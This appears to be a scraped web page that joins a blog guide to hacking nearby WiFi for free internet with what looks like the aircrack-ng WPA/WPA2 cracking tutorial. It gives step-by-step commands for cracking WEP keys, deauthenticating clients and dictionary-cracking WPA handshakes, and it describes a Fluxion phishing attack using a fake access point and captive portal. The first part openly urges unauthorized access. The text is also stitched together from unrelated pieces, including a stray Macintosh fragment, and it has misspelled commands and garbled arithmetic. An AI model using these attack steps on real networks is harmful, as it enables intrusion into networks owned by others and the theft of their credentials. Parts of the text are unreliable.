In this hi-tech life, we always need a working internet connection to manage both our professional and personal life. The most comfortable way to is by buying mobile data recharges but they are very expensive. Another good way to connect to free WiFi if it’s luckily available at your workplace, college or home.

But everyone is not that lucky. Everybody might have many fast WiFi hotspots available in their smartphone’s range, but they don’t have access to those WiFi connections because they are password protected and you don’t have access to them so, you can’t use those WiFi hotspot to access internet in your smartphone or laptop. But, what if you can hack a WiFi? Yes, I am not joking. What if you can hack any WiFi available in your range and crack it’s password to access free and unlimited internet? IMO, if you can learn a way to hack a WiFi network then you can access free internet everywhere. So, I am telling you the method to hack a secured WiFi network, crack its password and enjoy free internet using it.

Before moving directly to the methods to hack WiFi networks lets first see what type of security and authentication methods are implemented in WiFi networks. WiFi Security & Encryption Methods. Open – This is WiFi networks with no authentication.

Anyone in the WiFi range can connect his device to the network without any password in enjoy free internet. However, these networks are rarely available and also risky. WEP – Wired Equivalent Privacy (WEP) is a security protocol, specified in the IEEE Wireless Fidelity (Wi-Fi) standard, 802.11b, that is designed to provide a wireless local area network (WLAN) with a level of security and privacy comparable to what is usually expected of a wired LAN.

WPA – WiFi Protected Access (WPA) is improved and more secured security protocol which arrived with lots of improvements in encryption and authentication methods of WEP. WPA2 PSK – It is short of Wi-Fi Protected Access 2 – Pre-Shared Key which is the latest and most powerful encryption method used in WiFi networks right now. Hacking WiFi Networks with WEP, WPA and WPA2 PSK Security As security features have been improved from WEP to WPA to WPA2 PSK WiFi authentication protocol, so obviously, WEP WiFi networks are very easy to hack compared to WPA and WPA2 PSK Security methods. Almost every password-protected WiFi networks support both WPA/WPA2 PSK authentication.

If somebody is already connected to the network, you can check in his network properties to see what encryption-type is being using by the targeted WiFi network. WiFi Encryption Type in Windows 10 & Android Phone But if you want to know encryption-type of WiFi network which is not connected to any device in your reach, you need Ubuntu operating system to do this. In Ubuntu, you can use nmcli command in terminal which is command-line client for NetworkManager. It will show you security types of nearby Wi-Fi access points. Enter the following command in terminal: $ nmcli device wifi list It will show you the output like this: Using the above methods, you should have known the encryption-type of targeted WiFi network which you want to hack. So, I am gonna show you how to hack WiFi Network for each of WEP, WPA and WPA2 PSK secured WiFi networks.

Requirements for Hacking WiFi Netwoks My methods require KALI Linux which is especially designed Linux distrbution for penetration testing and ethical hacking. You can download it for free from. Download Kali Linux ISO from its website either install it as separate operating system in your system or you can use Virtual Machine/VMware to directly run KALI Linux inside Windows. You will also need which is a security suite to assess WiFi network security. It focuses on different area of WiFi security: monitoring, attacking, testing and cracking. Another important requirement is to check if your wireless card is compatible with Aircrack-ng or not.

Because if it’s not compatible, you need to have an Aircrack-ng compatible card. Check it directly here: or run aireplay-ng -9 mon0 command inside terminal to view the percentage of injection your card can do. Install Aircrack-ng using the following command in KALI LINUX. sudo apt-cache search aircrack-ng (to seach aircrack-ng or any related repositories). sudo apt-get install aircrack-ng (to install aircrack-ng repository) Fulfill only these requirements and you are ready to hack any WiFi network, whether it is a WEP, WPA or WPA2 PSK Wi-Fi. Steps to hack WiFi Networks Starting below, I’ll be guiding you step-by-step in hacking a secured WiFi network.

You can either scroll down to read each and every WiFi hacking method or can directly jump to the required section below using these links:. There are various methods to hack into WiFi network and crack its password for all the above security-types but I am showing only those methods with which I’ve had success in cracking password of desired WiFi network and hack secured WiFi Access points. So, if you follow these steps correctly, you’ll also be able to hack any WiFi hotspot available in your reach.

How To Hack WEP WiFi Network In this method, we are going to hack WEP secured WiFi network using packet injection method inside KALI Linux operating system. So, start KALI Linux in your system. Now follow these below steps: Step 1: Check Wireless Interface. Open terminal in Kali Linux and enter the command airmon-ng. It will show you what network interface are you using. In my system, I have only one network interface card wlan0, which is my wireless interface card. Create a network interface which runs in monitor mode.

To do this enter command airmon-ng start wlan0.Make sure to replace wlan0 in command with the interface name that your card have. Here, mon0 has been created. Now, you might or might not get the warning appearing in the below screenshot which tells other processes using the network which can create the problem. So, you can kill them using the syntax: kill PID if you know those processes are not important for you at the moment. Step 2: Scan available WEP WiFi networks.

Now, enter the command airodump-ng mon0 to scan & list down all the available WiFi networks using created monitor interface (mon0). It can take time to all the available WiFi networks in range. Once the process is done, all the available WiFi access points will appear with their important details: BSSID (WiFi Access Point MAC Address), PWR (Signal strength value; the lower, the better), CH (Channel for WiFi), ENC (Encryption type), AUTH, ESSID (Name of WiFi). Select the WiFi network with WEP Encryption (ENC) and lowest PWR value.

Selected WEP WiFi Access Point Step 3: Attack the selected WEP WiFi Network. Open another terminal concurrently and enter command: aidodump-ng -c 1 -w bell –bssid 64:0F:28:6B:A9:B1 mon0. Here, -c 1 indicates channel number which is 1, -w bell is to write data in file “bell”, –bssid 64:0F:28:6B:A9:B1 is MAC address for my selected WiFi access point and mon0 is monitor interface that was created above. Hit Enter and it will start sending packets (visible in #Data) to the WiFi Trying to authenticate WEP WiFi Network.

The speed of sending data is very slow but you need to escalate it by attacking the WEP WiFi network. First enter the command airplay-ng -1 0 -a 64:0F:28:6B:A9:B1 mon0 to perform fake authentication (-1 in command) to the network. Now we will perform ARP REPLAY Attack to the WiFi network to climb the data to the network at enormous rate. Use airplay-ng -3 -b 64:0F:28:6B:A9:B1 mon0, where -3 is for ARP REPLAY attack.

Looking gui for mac. The first Macintosh (1984) Popularization [ ] GUIs were a hot topic in the early 1980s.

Cracking Wep Wpa Wpa2 Wifi Aircrack. For Mac

Hit enter and the command will start doing attack to WEP WiFi Access point and you can see the #Data value increasing at enormously fast rate. In below screenshot the bell-01.cap is the file where data is being stored that we will use to crack the password of this WEP WiFi network once we have enough data (recommended #Data value should be over 35,000). Once you have enough data in the file bell-01.cap, run the command aircrack-ng bell-01.cap. It will test all the data values available in key file and automatically show you the key it found by testing data in file. WiFi Access Point Key Found. You can see in above screenshot that we have successfully cracked the password of targeted WEP WiFi network. The key found will not be in those text or alphanumeric format that the WiFi owner has created.

It will be in hex format but work just fine. Now, to use this key, firstly start the processes you have killed in Step 1 above using the command I have used below. Finally enter the cracked key 61:32:58:94:98 (without colon) as the password of targeted WEP WiFi Network and it will be connected. Steps to Hack WPA/WPA2 Secured WiFi Network Hacking into WPA/WPA2 WiFi Network is very tough, time & resource consuming.

The technique used to crack WPA/WPA2 WiFi password is 4-way handshake for which there is a requirement to have at least one device connected to the network. In WPA/WPA2 security method, the allowed password can have both large and small alphabets, numbers and symbols. And, allowed size of password is 64 characters. On a rough guess, if we consider password to be only 8 characters long and eliminate the use of symbols even then if you want to crack WPA or WPA2 WiFi password, using the brute force method the password combinations will be: 8 26+26+10=62 which is equals to:. 539264 So, even in fastest computer you can manage to use, it’s going to take hours. Aircrack-ng have all the tools required to crack into WPA/WPA2 PSK WiFi network. It can perform 4-way handshake by disconnecting/connecting the connected device and capturing WPA handshake.

It can perform brute-force attack but you can’t hope to crack the password if you have wordlist/dictionary for the password (which is already too big in size) with password inside it. I hate to tell you this but yes, doing it on your own can take forever. However, there is a tricky way to crack WPA/WPA2 WiFi Password quickly which only requires you to be a bit lucky. Fluxion use same 4-way handshake technique to crack secured WPA/WPA2 WiFi access points password but it doesn’t require you to have dictionary or perform brute force attack. So yes, it’s going to minimize your time to hack WPA or WPA2 WiFi networks password multiple folds.

Instead of doing this, it performs a little bit of phishing where the already connected user is asked to enter password of WiFi network again for security reason and when the user enter the password, first the handshake is checked with the earlier captured handshake of the device, if handshake is correct that means the password entered by user is correct. Once it is successful, Fluxion returns the key required to authenticate the network. Steps to crack WPA/WPA2 WiFi Password using Fluxion.

Scan the networks. Capture a handshake (can’t be used without a valid handshake, it’s necessary to verify the password). Use WEB Interface. Launch a FakeAP instance to imitate the original access point.

Spawns a MDK3 process, which deauthenticates all users connected to the target network, so they can be lured to connect to the FakeAP and enter the WPA password. A fake DNS server is launched in order to capture all DNS requests and redirect them to the host running the script. A captive portal is launched in order to serve a page, which prompts the user to enter their WPA password. Each submitted password is verified by the handshake captured earlier. The attack will automatically terminate, as soon as a correct password is submitted I can understand that not all readers will be able to implement the method after reading such summarized version on hacking WPA/WPA2 PSK WiFi Network.

So, below is the video tutorial on cracking WPA2 WiFi Access Point password using Fluxion. Comments below if you face any problem in hacking WEP, WPA and WPA2 PSK WiFi Networks using the above methods.

This tutorial walks you through cracking WPA/WPA2 networks which use pre-shared keys. I recommend you do some background reading to better understand what WPA/WPA2 is. The links page has a. The best document describing WPA is.

This is the to download the PDF directly. The is a companion to this tutorial. WPA/WPA2 supports many types of authentication beyond pre-shared keys. Can ONLY crack pre-shared keys. So make sure shows the network as having the authentication type of PSK, otherwise, don't bother trying to crack it.

There is another important difference between cracking WPA/WPA2 and WEP. This is the approach used to crack the WPA/WPA2 pre-shared key.

Unlike WEP, where statistical methods can be used to speed up the cracking process, only plain brute force techniques can be used against WPA/WPA2. That is, because the key is not static, so collecting IVs like when cracking WEP encryption, does not speed up the attack.

The only thing that does give the information to start an attack is the handshake between client and AP. Handshaking is done when the client connects to the network. Although not absolutely true, for the purposes of this tutorial, consider it true. Since the pre-shared key can be from 8 to 63 characters in length, it effectively becomes impossible to crack the pre-shared key. The only time you can crack the pre-shared key is if it is a dictionary word or relatively short in length. Conversely, if you want to have an unbreakable wireless network at home, use WPA/WPA2 and a 63 character password composed of random characters including special symbols.

The impact of having to use a brute force approach is substantial. Because it is very compute intensive, a computer can only test 50 to 300 possible keys per second depending on the computer CPU. It can take hours, if not days, to crunch through a large dictionary. If you are thinking about generating your own password list to cover all the permutations and combinations of characters and special symbols, check out this first. You will be very surprised at how much time is required. IMPORTANT This means that the passphrase must be contained in the dictionary you are using to break WPA/WPA2. If it is not in the dictionary then aircrack-ng will be unable to determine the key.

There is no difference between cracking WPA or WPA2 networks. The authentication methodology is basically the same between them.

So the techniques you use are identical. It is recommended that you experiment with your home wireless access point to get familiar with these ideas and techniques. If you do not own a particular access point, please remember to get permission from the owner prior to playing with it. Please send me any constructive feedback, positive or negative. Additional troubleshooting ideas and tips are especially welcome. The objective is to capture the WPA/WPA2 authentication handshake and then use to crack the pre-shared key. This can be done either actively or passively.

“Actively” means you will accelerate the process by deauthenticating an existing wireless client. “Passively” means you simply wait for a wireless client to authenticate to the WPA/WPA2 network.

The advantage of passive is that you don't actually need injection capability and thus the Windows version of aircrack-ng can be used. Here are the basic steps we will be going through:. The purpose of this step is to put your card into what is called monitor mode. Monitor mode is the mode whereby your card can listen to every packet in the air. Normally your card will only “hear” packets addressed to you. By hearing every packet, we can later capture the WPA/WPA2 4-way handshake.

As well, it will allow us to optionally deauthenticate a wireless client in a later step. The exact procedure for enabling monitor mode varies depending on the driver you are using. To determine the driver (and the correct procedure to follow), run the following command: airmon-ng On a machine with a Ralink, an Atheros and a Broadcom wireless card installed, the system responds: Interface Chipset Driver rausb0 Ralink RT73 rt73 wlan0 Broadcom b43 - phy0 wifi0 Atheros madwifi-ng ath0 Atheros madwifi-ng VAP (parent: wifi0) The presence of a phy0 tag at the end of the driver name is an indicator for mac80211, so the Broadcom card is using a mac80211 driver. Note that mac80211 is supported only since aircrack-ng v1.0-rc1, and it won't work with v0.9.1. Both entries of the Atheros card show “madwifi-ng” as the driver - follow the madwifi-ng-specific steps to set up the Atheros card.

Finally, the Ralink shows neither of these indicators, so it is using an ieee80211 driver - see the generic instructions for setting it up. Step 1a - Setting up madwifi-ng. First stop ath0 by entering: airmon-ng stop ath0 The system responds: Interface Chipset Driver wifi0 Atheros madwifi-ng ath0 Atheros madwifi-ng VAP (parent: wifi0) (VAP destroyed) Enter “iwconfig” to ensure there are no other athX interfaces. It should look similar to this: lo no wireless extensions. Eth0 no wireless extensions. Wifi0 no wireless extensions. If there are any remaining athX interfaces, then stop each one.

When you are finished, run “iwconfig” to ensure there are none left. Now, enter the following command to start the wireless card on channel 9 in monitor mode: airmon-ng start wifi0 9 Note: In this command we use “wifi0” instead of our wireless interface of “ath0”. This is because the madwifi-ng drivers are being used.

The system will respond: Interface Chipset Driver wifi0 Atheros madwifi-ng ath0 Atheros madwifi-ng VAP (parent: wifi0) (monitor mode enabled) You will notice that “ath0” is reported above as being put into monitor mode. To confirm the interface is properly setup, enter “iwconfig”. The system will respond: lo no wireless extensions.

Wifi0 no wireless extensions. Eth0 no wireless extensions. Ath0 IEEE 802.11g ESSID:' Nickname:' Mode:Monitor Frequency:2.452 GHz Access Point: 00:0F:B5:88:AC:82 Bit Rate:0 kb/s Tx-Power:18 dBm Sensitivity=0/3 Retry:off RTS thr:off Fragment thr:off Encryption key:off Power Management:off Link Quality=0/94 Signal level=-95 dBm Noise level=-95 dBm Rx invalid nwid:0 Rx invalid crypt:0 Rx invalid frag:0 Tx excessive retries:0 Invalid misc:0 Missed beacon:0 In the response above, you can see that ath0 is in monitor mode, on the 2.452GHz frequency which is channel 9 and the Access Point shows the MAC address of your wireless card.

Only the madwifi-ng drivers show the card MAC address in the AP field, other drivers do not. So everything is good. It is important to confirm all this information prior to proceeding, otherwise the following steps will not work properly. To match the frequency to the channel, check out:.

This will give you the frequency for each channel. Step 1b - Setting up mac80211 drivers. Unlike madwifi-ng, you do not need to remove the wlan0 interface when setting up mac80211 drivers. Instead, use the following command to set up your card in monitor mode on channel 9: airmon-ng start wlan0 9 The system responds: Interface Chipset Driver wlan0 Broadcom b43 - phy0 (monitor mode enabled on mon0) Notice that airmon-ng enabled monitor-mode on mon0. So, the correct interface name to use in later parts of the tutorial is mon0. Wlan0 is still in regular (managed) mode, and can be used as usual, provided that the AP that wlan0 is connected to is on the same channel as the AP you are attacking, and you are not performing any channel-hopping. To confirm successful setup, run “iwconfig”.

The following output should appear: lo no wireless extensions. Eth0 no wireless extensions. Wmaster0 no wireless extensions. Ath0 is the interface name.

Important: Do NOT use the “- -ivs” option. You must capture the full packets. Here what it looks like if a wireless client is connected to the network: CH 9 Elapsed: 4 s 2007-03-24 16:58 WPA handshake: 00:14:6C:7E:40:80 BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID 00:14:6C:7E:40:80 39 100 51 116 14 9 54 WPA2 CCMP PSK teddy BSSID STATION PWR Lost Packets Probes 00:14:6C:7E:40:80 00:0F:B5:FD:FB:C2 35 0 116 In the screen above, notice the “WPA handshake: 00:14:6C:7E:40:80” in the top right-hand corner. This means airodump-ng has successfully captured the four-way handshake. Here it is with no connected wireless clients: CH 9 Elapsed: 4 s 2007-03-24 17:51 BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID 00:14:6C:7E:40:80 39 100 51 0 0 9 54 WPA2 CCMP PSK teddy BSSID STATION PWR Lost Packets Probes Troubleshooting Tip. See the below for ideas. To see if you captured any handshake packets, there are two ways.

Watch the airodump-ng screen for “ WPA handshake: 00:14:6C:7E:40:80” in the top right-hand corner. This means a four-way handshake was successfully captured. See just above for an example screenshot.

Use Wireshark and apply a filter of “eapol”. This displays only eapol packets you are interested in. Thus you can see if capture contains 0,1,2,3 or 4 eapol packets. Step 3 - Use aireplay-ng to deauthenticate the wireless client. This step is optional. If you are patient, you can wait until airodump-ng captures a handshake when one or more clients connect to the AP. You only perform this step if you opted to actively speed up the process.

The other constraint is that there must be a wireless client currently associated with the AP. If there is no wireless client currently associated with the AP, then you have to be patient and wait for one to connect to the AP so that a handshake can be captured.

Needless to say, if a wireless client shows up later and airodump-ng did not capture the handshake, you can backtrack and perform this step. This step sends a message to the wireless client saying that that it is no longer associated with the AP. The wireless client will then hopefully reauthenticate with the AP. The reauthentication is what generates the 4-way authentication handshake we are interested in collecting. This is what we use to break the WPA/WPA2 pre-shared key. Based on the output of airodump-ng in the previous step, you determine a client which is currently connected.

You need the MAC address for the following. Open another console session and enter: aireplay-ng -0 1 -a 00:14:6C:7E:40:80 -c 00:0F:B5:FD:FB:C2 ath0 Where:. The purpose of this step is to actually crack the WPA/WPA2 pre-shared key. To do this, you need a dictionary of words as input.

Basically, aircrack-ng takes each word and tests to see if this is in fact the pre-shared key. There is a small dictionary that comes with aircrack-ng - “password.lst”. This file can be found in the “test” directory of the aircrack-ng source code. The has an extensive list of dictionary sources. You can use (JTR) to generate your own list and pipe them into.

Using JTR in conjunction with aircrack-ng is beyond the scope of this tutorial. Open another console session and enter: aircrack-ng -w password.lst -b 00:14:6C:7E:40:80 psk.cap Where:.cap is name of group of files containing the captured packets.

Notice in this case that we used the wildcard. to include multiple files. Here is typical output when there are no handshakes found: Opening psk-01.cap Opening psk-02.cap Opening psk-03.cap Opening psk-04.cap Read 1827 packets. No valid WPA handshakes found.

When this happens you either have to redo step 3 (deauthenticating the wireless client) or wait longer if you are using the passive approach. When using the passive approach, you have to wait until a wireless client authenticates to the AP.

Here is typical output when handshakes are found: Opening psk-01.cap Opening psk-02.cap Opening psk-03.cap Opening psk-04.cap Read 1827 packets. # BSSID ESSID Encryption 1 00:14:6C:7E:40:80 teddy WPA (1 handshake) Choosing first network as target. Now at this point, aircrack-ng will start attempting to crack the pre-shared key. Depending on the speed of your CPU and the size of the dictionary, this could take a long time, even days. Here is what successfully cracking the pre-shared key looks like: Aircrack-ng 0.8 00:00:00 2 keys tested (37.20 k/s) KEY FOUND! 12345678 Master Key: CD 69 0D 11 8E AC AA C5 C5 EC BB 59 85 7D 49 3E B8 A6 13 C5 4A 72 82 38 ED C3 7E 2C 59 5E AB FD Transcient Key: 06 F8 BB F3 B1 55 AE EE 1F 66 AE 51 1F F8 12 98 CE 8A 9D A0 FC ED A6 DE 70 84 BA 90 83 7E CD 40 FF 1D 41 E1 65 17 93 0E 64 32 BF 25 50 D5 4A 5E 2B 20 90 8C EA 32 15 A6 26 62 93 27 66 66 E0 71 EAPOL HMAC: 4E 27 D9 5B 00 91 53 57 88 9C 66 C8 B1 29 D1 CB Troubleshooting Tips.

Your monitor card must be in the same mode as the both the client and Access Point. So, for example, if your card was in “B” mode and the client/AP were using “G” mode, then you would not capture the handshake. This is especially important for new APs and clients which may be “turbo” mode and/or other new standards. Some drivers allow you to specify the mode. Also, iwconfig has an option “modulation” that can sometimes be used. Do “man iwconfig” to see the options for “modulation”.

For information, 1, 2, 5.5 and 11Mbit are 'b', 6, 9, 12, 18, 24, 36, 48, 54Mbit are 'g'. If you use the deauth technique, send the absolute minimum of packets to cause the client to reauthenticate. Normally this is a single deauth packet. Sending an excessive number of deauth packets may cause the client to fail to reconnect and thus it will not generate the four-way handshake. As well, use directed deauths, not broadcast. To confirm the client received the deauthentication packets, use tcpdump or similar to look for ACK packets back from the client. If you did not get an ACK packet back, then the client did not “hear” the deauthentication packet.

Review your captured data using the to see if you can identify the problem. Such as missing AP packets, missing client packets, etc. Unfortunately, sometimes you need to experiment a bit to get your card to properly capture the four-way handshake.

The point is, if you don't get it the first time, have patience and experiment a bit. It can be done! Another approach is to use Wireshark to review and analyze your packet capture. This can sometimes give you clues as to what is wrong and thus some ideas on how to correct it. The is a companion to this tutorial and walks you through what a “normal” WPA connection looks like. As well, see the for detailed information on how to use Wireshark. In an ideal world, you should use a wireless device dedicated to capturing the packets.

This is because some drivers such as the RTL8187L driver do not capture packets the card itself sends. Also, always use the driver versions specified on the wiki. This is because some older versions of the drivers such as the RT73 driver did not capture client packets. When using Wireshark, the filter “eapol” will quickly display only the EAPOL packets. Based on what EAPOL packets are actually in the capture, determine your correction plan. For example, if you are missing the client packets then try to determine why and how to collect client packets. To dig deep into the packet analysis, you must start airodump-ng without a BSSID filter and specify the capture of the full packet, not just IVs.

Needless to say, it must be locked to the AP channel. The reason for eliminating the BSSID filter is to ensure all packets including acknowledgments are captured. With a BSSID filter, certain packets are dropped from the capture. Every packet sent by client or AP must be acknowledged. This is done with an “acknowledgment” packet which has a destination MAC of the device which sent the original packet. If you are trying to deauthenticate a client, one thing to check is that you receive the “ack” packet. This confirms the client received the deauth packet.

Failure to receive the “ack” packet likely means that the client is out of transmission range. Thus failure. When it comes to analyzing packet captures, it is impossible to provide detailed instructions. I have touched on some techniques and areas to look at. This is an area which requires effort to build your skills on both WPA/WPA2 plus how to use Wireshark. Aircrack-ng says '0 handshakes'.